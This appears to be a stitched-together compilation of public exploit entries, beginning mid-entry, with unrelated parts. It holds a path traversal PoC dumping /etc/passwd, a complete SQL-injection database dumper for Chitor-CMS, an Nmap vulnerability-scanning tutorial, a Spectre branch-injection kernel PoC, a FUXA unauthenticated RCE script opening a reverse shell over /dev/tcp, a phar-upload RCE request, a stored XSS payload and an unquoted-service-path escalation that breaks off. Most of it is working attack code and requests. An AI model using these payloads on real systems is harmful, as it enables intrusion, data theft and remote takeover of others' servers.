4. $filename=$_GET["filename"];
.....
.....
27. @readfile($filename) OR die();
### POC :
URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd
Exploitation using curl
# curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
ntp:x:104:110::/nonexistent:/usr/sbin/nologin
messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
vboxadd:x:998:1::/var/run/vboxadd:/bin/false
openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
https://nvd.nist.gov/vuln/detail/CVE-2023-27179
https://www.exploit-db.com/papers/12883
#!/usr/bin/python3
#######################################################
# #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
# Date: 2023/04/13 #
# ExploitAuthor: msd0pe #
# Project: https://github.com/waqaskanju/Chitor-CMS #
# My Github: https://github.com/msd0pe-1 #
# Patched the 2023/04/16: 69d3442 commit #
# #
#######################################################
__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
OCRA = '\033[93m'
RED = '\033[91m'
CYAN = '\033[96m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class infos:
INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
import re
import requests
import optparse
from prettytable import PrettyTable
def DumpTable(url, database, table):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
columns = []
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
columns.append(i)
pass
except:
pass
x.field_names = columns
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
x.add_rows([i])
except ValueError:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
i.append("")
x.add_rows([i])
print(x)
def ListTables(url, database):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["TABLES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def ListDatabases(url):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["DATABASES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def Main():
Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
(options, args) = Menu.parse_args()
Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
Menu.add_option_group(Examples)
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
Menu.print_help()
print('')
print(' %s' % __description__)
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
print(' Any malicious or illegal activity may be punishable by law')
print(' Use at your own risk')
elif len(args) == 0:
try:
if options.url != None:
if options.l_databases != None:
ListDatabases(options.url)
if options.database != None:
if options.l_tables != None:
ListTables(options.url, options.database)
if options.table != None:
if options.dump != None:
DumpTable(options.url, options.database, options.table)
except:
print("Unexpected error")
if __name__ == '__main__':
try:
Main()
except KeyboardInterrupt:
print()
print(infos.PROCESS + "Exiting...")
print()
exit(1)
A little-known part of Nmap is NSE, or Nmap Scripting Engine, which is one of the most powerful and flexible features of Nmap. It allows users to write (and share) simple scripts to automate various network tasks. Nmap has a comprehensive collection of NSE scripts built in, which users can easily use, but users can also use NSE to create custom scripts to meet their personalized needs. Here I will show two similar prefabricated NSE scripts, nmap-vulners and vulscan at the same time. These two scripts are designed to enhance version detection of Nmap by generating relevant CVE information for specific services such as SSH, RDP, SMB, etc. CVE or Common Vulnerabilities and Exposures is a method used by security researchers to leverage databases to catalog and reference individual vulnerabilities.
For example, an exploit database is a popular database that publicly discloses vulnerabilities. Exploit-DB uses CVE to compile individual vulnerabilities and vulnerabilities associated with specific versions of services such as "SSH v7.2". Here are screenshots that might be exploited on the Exploit-DB website. Please note the CVE number assigned to this particular SSH vulnerability.
Both nmap-vulners and vulscan use CVE records to enhance Nmap's version detection. Nmap will identify the version information of the scan service. The NSE script will get that information and generate a known CVE that can be used to exploit the service, making it easier to find vulnerabilities.
Below is an example of Nmap version detection without using NSE scripts. Nmap found an SSH service on port 22 using version "OpenSSH 4.3".
nmap -sV -p22 1##.##.###.##.##21
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.58s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
`````
Here is an example of the same server using NSE scripts. We can now see that there is more information output. nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.###.##.#21
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.54s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:4.3:
| CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051
| CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924
| CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
| CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904
| CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109
| CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052
| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
| CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
|_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259
| vulscan: scipvuldb.csv:
| [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
| [39331] OpenBSD 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
| [32512] OpenBSD OpenSSH up to 4.3 unknown vulnerability
| [43307] OpenBSD 4.0 unknown vulnerability
| [41835] OpenBSD up to 4.8 unknown vulnerability
| [38743] OpenBSD up to 4.6 unknown vulnerability
| [36382] OpenBSD OpenSSH up to 4.6 information disclosure
| [32699] OpenBSD OpenSSH 4.1 denial of service
| [2667] OpenBSD OpenSSH 4.4 Separation Monitor Designfehler
| [2578] OpenBSD OpenSSH up to 4.4 Singal race condition
| [32532] OpenBSD OpenSSH 4.5 packet.c denial of service
| [1999] OpenBSD OpenSSH up to 4.2pl scp system() Designfehler
| [1724] OpenBSD OpenSSH 4.0 GSSAPIDelegateCredentials Designfehler
| [1723] OpenBSD OpenSSH 4.0 Dynamic Port Forwarding Designfehler
| [26219] OpenBSD OpenSSH up to 4.1 pl information disclosure
| [16020] OpenBSD OpenSSH 4.5 Format String
The `nmap-vulners NSE` script reports a dozen CVEs disclosed in the past few years. nmap-vulners CVE is organized by severity, "9.3" is the worst and is at the top of the list, so it is worth studying. The vulscan NSE script (after all CVEs) also reports a dozen interesting vulnerabilities related to OpenSSH v4.3.
Both NSE scripts show useful information about vulnerable services well. Every time we use NSE scripts, Nmap-vulners will query the Vulners exploit database. Vulscan, on the other hand, queries the local database on our computer, which was preconfigured when we first downloaded vulscan.
#Step 1
##Installation: Nmap-Vulners
To install the nmap-vulners script, we first use cd to change to the Nmap script directory. cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the following command in the terminal. This is why nmap-vulners is installed. No configuration is required after installation. git clone https://github.com/vulnersCom/nmap-vulners.git
#Step 2
##Installation: Vulscan
To install vulscan, we also need to clone the GitHub repository into the Nmap script directory. Use the following command to do this. git clone https://github.com/scipag/vulscan.git
As mentioned earlier, vulscan uses a preconfigured database stored locally on our computers. We can view these databases in the root directory of the vulscan directory. Run the following ls command to list the available databases. ls vulscan/*.csv
vulscan/cve.csv
vulscan/exploitdb.csv
vulscan/openvas.csv
vulscan/osvdb.csv
vulscan/scipvuldb.csv
vulscan/securityfocus.csv
vulscan/securitytracker.csv
vulscan/xforce.csv
### Vulscan supports many excellent exploit databases: scipvuldb.csv
cve.csv
osvdb.csv
securityfocus.csv
securitytracker.csv
xforce.csv
exploitdb.csv
openvas.csv
To ensure that the database is completely up-to-date, we can use the updateFiles.sh script in the vulscan/utilities/updater/directory. Switch to the updater directory by typing the following command in the terminal. cd vulscan/utilities/updater/
Then, use the following chmod command to make sure that the file has the appropriate permissions to execute on your computer. chmod +x updateFiles.sh
We can then execute and run the script by typing the following command in our terminal./updateFiles.sh
Once we're done, we can now start using NSE scripts.
#Step 3
##Scan with Nmap-Vulners
Using NSE scripts is simple. All we have to do is add the --script parameter to our Nmap command and tell Nmap which NSE script to use. To use the nmap-vulners script, we will use the following command. Of course, change #after -p to scan port and change the following #s to the IP address you are using. nmap --script nmap-vulners -sV -p### #.### .#### .#####
The -sV is absolutely necessary. Using -sV, we tell Nmap to detect the target address of the version information. If Nmap does not generate version information, nmap-vulners will have no data to query the Vulners database. Always use -sV when using these NSE scripts. nmap --script nmap-vulners -sV -p80 1##.##.###.##.#24
Here is one of the examples in use: nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p22 1##.##.###.##.#43
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.###.##.#43
Host is up (0.52s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| vulscan: exploitdb.csv:
| [2444] OpenSSH=4.3 pl (Duplicated Block) Remote Denital of Service Exploit
| [21402] OpenSSH s.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [3303] Portable OpenSSH=3.6.1p-PAM/4.1-SUSE Timing Attack Exploit
As VulDB's chief architect, vulscan developers usually spend time updating scipvuldb.csv database files. Querying the database may yield the best results when using the vulscan NSE script.
#Step Five
Merge into one command
As a security scanner, NSE scripts significantly improve Nmap's versatility, scope and resourcefulness. To make full use of Nmap's version scanning, we can use both nmap-vulners and vulscan in one command. To do this, type the following command in the terminal. nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p### #.### .### .#### .####
## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
## Exploit Author: nu11secur1ty
## CVE ID: CVE-2023-1998
## Description
## Summary
The Linux kernel allows userspace processes to enable mitigations by
calling prctl with
[PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html)
which disables the speculation feature as well as by using seccomp. We
had noticed that on VMs of at least one major cloud provider, the
kernel still left the victim process exposed to attacks in some cases
even after enabling the spectre-BTI mitigation with prctl. The same
beahaviour can be observed on a bare-metal machine when forcing the
mitigation to IBRS on boot comand line.
This happened because when plain IBRS was enabled (not enhanced IBRS),
the kernel had some logic that determined that
[STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html)
was not needed. The IBRS bit implicitly protects against cross-thread
branch target injection. However, with legacy
[IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html),
the IBRS bit was cleared on returning to userspace, due to performance
reasons, which disabled the implicit STIBP and left userspace threads
vulnerable to cross-thread branch target injection against which STIBP
protects.
## Severity
Medium - The kernel failed to protect applications that attempted to
protect against Spectre v2 leaving them open to attack from other
processes running on the same physical core in another hyperthread.
## Vulnerable code
The Bug present on Kernel 6.2
(https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196)
implements an optimization that disables STIBP if the mitgation is
IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace
as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for
bare metal machines without eIBRS support also triggers the bug.
```c
/*
* If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
* STIBP is not required.
*/
if (!boot_cpu_has(X86_FEATURE_STIBP) ||
!smt_possible ||
spectre_v2_in_ibrs_mode(spectre_v2_enabled))
return;
```
## Proof of Concept
The test consists of two processes. The attacker constantly poisons an
indirect call to speculatively redirect it to a target address. The
victim process measures the mispredict rate and tries to mitigate the
attack either by calling PRCTL or writing to the MSR directly using a
kernel module that exposes MSR read and write operations to userspace.
```c
/*
gcc -o victim test.c -O0 -masm=intel -w -DVICTIM
gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL
gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM
-DMSR -DMSR_VAL=0
gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1
gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2
gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR
-DMSR_VAL=0 -DIBPB
gcc -o attacker test.c -O0 -masm=intel -w
*/
#include "utils.h"
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#ifndef PRINT_AMMOUNT
#define PRINT_AMMOUNT 1000
#endif
#define IA32_SPEC_CTRL 72
uint8_t *rdiPtr;
uint8_t unused[0x500];
uint8_t probeArray[0x1000] = {2};
uint8_t unuse2[0x500];
uint32_t f1() {}
int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu)
{
volatile uint8_t d;
unsigned tries = 0;
unsigned hits = 0;
unsigned totalHits = 0;
unsigned totalTries = 0;
jitForLoop(srcAddress);
while (1)
{
#ifndef VICTIM
callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
continue;
#else
#ifdef IBPB
wrmsr_on_cpu(73, cpu, 1);
#endif
for (int i = 0; i < 100; i++)
{
d = *dstAddress;
flush((uint8_t *)&rdiPtr);
callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
}
if (probe(&probeArray[0]) < THRESHOLD)
{
hits++;
totalHits++;
}
totalTries++;
if (++tries % PRINT_AMMOUNT == 0)
{
printf("Rate: %u/%u MSR[72]=%d\n", hits,
tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu));
#ifdef MSR
wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
#endif
tries = 0;
hits = 0;
if (totalTries >= PRINT_AMMOUNT * 10)
{
break;
}
}
usleep(1);
#endif
}
printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits,
totalTries, (float)totalHits * 100 / (float)totalTries);
}
int main(int argc, char **argv)
{
uint64_t srcAddress;
uint64_t dstAddress;
uint64_t cpu;
if (argc < 4)
{
printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]);
printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]);
return 0;
}
srcAddress = (uint64_t)strtoull(argv[1], NULL, 16);
dstAddress = (uint64_t)strtoull(argv[2], NULL, 16);
cpu = (uint64_t)strtoull(argv[3], NULL, 16);
SetCoreAffinity(cpu);
uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000);
uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000);
#ifdef PRCTL
if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
PR_SPEC_FORCE_DISABLE, 0, 0) != 0)
{
perror("prctl");
}
printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL,
PR_SPEC_INDIRECT_BRANCH, 0, 0, 0));
#endif
#ifdef MSR
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu);
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
// set up leak gadget into position
#ifdef VICTIM
rdiPtr = (uint8_t *)f1;
copyLeakGadget(dstAddress);
#else
rdiPtr = (uint8_t *)dstAddress;
copyRetGadget(dstAddress);
#endif
poison(srcAddress, dstAddress, cpu);
#ifdef MSR
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
}
```
Timeline
**Date reported** to Cloud providers: 31/12/2022
**Date reported** to security@kernel.org: 20/02/2022
**Date fixed:** 10/03/2023
- [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d)
- https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d
Date disclosed: 12/04/2023
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186 (current)
from argparse import RawTextHelpFormatter
import argparse, sys, threading, requests
def main(rhost, rport, lhost, lport):
url = "http://"+rhost+":"+rport+"/api/runscript"
payload = {
"headers":
{
"normalizedNames":{},
"lazyUpdate": "null"
},
"params":{
"script":{
"parameters":[
{
"name":"ok",
"type":"tagid",
"value":""
}
],
"mode":"",
"id":"",
"test":"true",
"name":"ok",
"outputId":"",
"code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
}
}
}
response = requests.post(url, json=payload)
args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')
args=parser.parse_args()
main(args.rhost, args.rport, args.lhost, args.lport)
Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date of found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again
Payload:<?php echo system("id"); ?>
poc request:
POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream
<?php echo system("id"); ?>
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"
file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--
visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date of found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)
payload: <img%20src=x%20onerror=alert(4)>
POST /piwigo/admin.php?page=photo-9 HTTP/1.1
Host: localhost
Content-Length: 159
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/piwigo/admin.php?page=photo-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
Connection: close
name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings
#####################################################################
# #
# Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path #
# Date: 2023/04/21 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://oscinventory-ng.org #
# Software Link: https://github.com/OCSInventory-NG/WindowsAgent #
# My Github: https://github.com/msd0pe-1 #
# Fixed in version 2.3.1.0 #
# #
#####################################################################
OCS Inventory NG Windows Agent:
Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto
[2] Get informations about the service:
> sc qc "OCS Inventory Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OCS Inventory Service
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
